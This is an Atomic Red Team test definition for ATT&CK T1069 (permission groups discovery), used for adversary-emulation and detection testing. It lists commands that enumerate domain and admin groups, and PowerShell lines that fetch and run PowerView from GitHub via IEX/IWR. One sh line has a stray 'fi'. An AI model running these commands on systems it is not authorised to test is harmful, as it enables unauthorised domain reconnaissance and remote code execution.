CircleCI Atomic Red Team doc generator
124 lines
4.5 KiB
YAML
124 lines
4.5 KiB
YAML
---
|
|
attack_technique: T1069
|
|
display_name: Permission Groups Discovery
|
|
|
|
atomic_tests:
|
|
- name: Permission Groups Discovery
|
|
auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae
|
|
description: |
|
|
Permission Groups Discovery
|
|
|
|
supported_platforms:
|
|
- macos
|
|
- linux
|
|
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
|
|
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
|
|
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
|
|
|
|
- name: Basic Permission Groups Discovery Windows
|
|
auto_generated_guid: 1f454dd6-e134-44df-bebb-67de70fb6cd8
|
|
description: |
|
|
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
information will be displayed.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
net localgroup
|
|
net group /domain
|
|
net group "domain admins" /domain
|
|
|
|
- name: Permission Groups Discovery PowerShell
|
|
auto_generated_guid: 53d91444-6225-4e67-9df1-747dd74550f9
|
|
description: |
|
|
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
information will be displayed.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
user:
|
|
description: User to identify what groups a user is a member of
|
|
type: string
|
|
default: administrator
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
get-localgroup
|
|
get-ADPrincipalGroupMembership #{user} | select name
|
|
|
|
- name: Elevated group enumeration using net group
|
|
auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
|
|
description: |
|
|
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
|
|
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
net group /domai "Domain Admins"
|
|
net groups "Account Operators" /doma
|
|
net groups "Exchange Organization Management" /doma
|
|
net group "BUILTIN\Backup Operators" /doma
|
|
|
|
- name: Find machines where user has local admin access (PowerView)
|
|
auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
|
|
description: |
|
|
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-LocalAdminAccess -Verbose
|
|
|
|
- name: Find local admins on all machines in domain (PowerView)
|
|
auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
|
|
description: |
|
|
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin -Verbose
|
|
|
|
- name: Find Local Admins via Group Policy (PowerView)
|
|
auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
|
|
description: |
|
|
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
computer_name:
|
|
description: hostname of the computer to analyze
|
|
type: Path
|
|
default: $env:COMPUTERNAME
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose |